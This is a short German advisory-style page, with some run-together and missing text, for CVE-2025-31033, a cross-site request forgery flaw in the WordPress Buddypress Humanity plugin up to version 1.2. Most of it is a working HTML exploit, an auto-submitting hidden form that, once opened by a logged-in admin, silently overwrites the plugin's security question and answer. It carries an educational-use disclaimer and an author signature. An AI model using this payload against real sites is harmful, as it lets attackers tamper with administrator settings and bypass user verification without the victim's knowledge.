
WordPress Buddypress Humanity Plugin <= 1.2 ist anfällig für Cross Site Request Forgery (CSRF)
Das Buddypress Humanity Plugin für WordPress (Version <= 1.2) ist anfällig für Cross-Site Request Forgery (CSRF).
Diese Schwachstelle ermöglicht es einem Angreifer, einen Benutzer mit höheren Berechtigungen (z.B. Admin) dazu zu zwingen, ohne sein Wissen Plugin-Einstellungen (wie Sicherheitsfrage und -antwort) zu ändern und damit die Benutzerverifizierungslogik zu umgehen.
bph-settings Seite (nur Admin)CVE-2025-31033Bei erfolgreicher Ausnutzung ermöglicht diese Schwachstelle Angreifern Folgendes:
buddypress-humanity<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
☠️ Sobald diese Seite von einem authentifizierten Admin geöffnet wird, ändert sie stillschweigend die Plugin-Einstellungen.
Dieses Proof of Concept dient ausschließlich zu Bildungszwecken.
Verwenden Sie es verantwortungsbewusst und testen Sie nicht an Systemen, die Ihnen nicht gehören.
Der Autor übernimmt keine Verantwortung für Missbrauch oder verursachte Schäden.
Nxploited | Khaled Alenazi